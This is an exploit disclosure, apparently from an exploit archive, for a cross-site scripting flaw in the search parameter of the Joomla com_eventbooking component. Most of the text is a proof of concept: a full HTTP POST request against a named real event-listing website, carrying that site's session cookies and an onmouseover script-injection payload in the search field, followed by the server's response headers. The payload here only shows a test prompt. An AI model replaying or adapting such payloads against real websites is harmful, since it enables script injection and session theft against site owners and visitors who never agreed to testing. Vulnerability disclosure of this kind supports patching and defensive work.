##################################################################################################
#Exploit Title : Joomla com_eventbooking component XSS vulnerability
#Author : Jagriti Sahu AKA incredible
#Download Link : https://github.com/Jasonudoo/platform/tree/master/components/com_eventbooking
#Date : 13/11/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mrudula and Harry
#Discovered At : Indishell Lab
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
joomla component com_eventbooking is not filtering data in search parameter
and hence affected from XSS vulnerability
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to search parameter in search box, and pron to xss vulnerability
////////////////
/// POC ////
///////////////
POC image=http://oi61.tinypic.com/aol6qc.jpg
http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101
POST /index.php?option=com_eventbooking&Itemid=101 HTTP/1.1
Host: eastvicevents.com.au
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101
Cookie: 230d19898da30be54648f536cbac3652=ca2096bf2055cf7c31462f8f056f84d4; __utma=222259084.1320908457.1415891642.1415891642.1415891642.1; __utmb=222259084.18.10.1415891642; __utmc=222259084; __utmz=222259084.1415891642.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 177
search=test" onmouseover=prompt(String.fromCharCode(120,115,115,32,116,101,115,116,105,110,103));//&category_id=13&location_id=474&option=com_eventbooking&Itemid=101&view=search
HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Thu, 13 Nov 2014 16:10:17 GMT
Server: LiteSpeed
X-Powered-By: PHP/5.5.18
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: close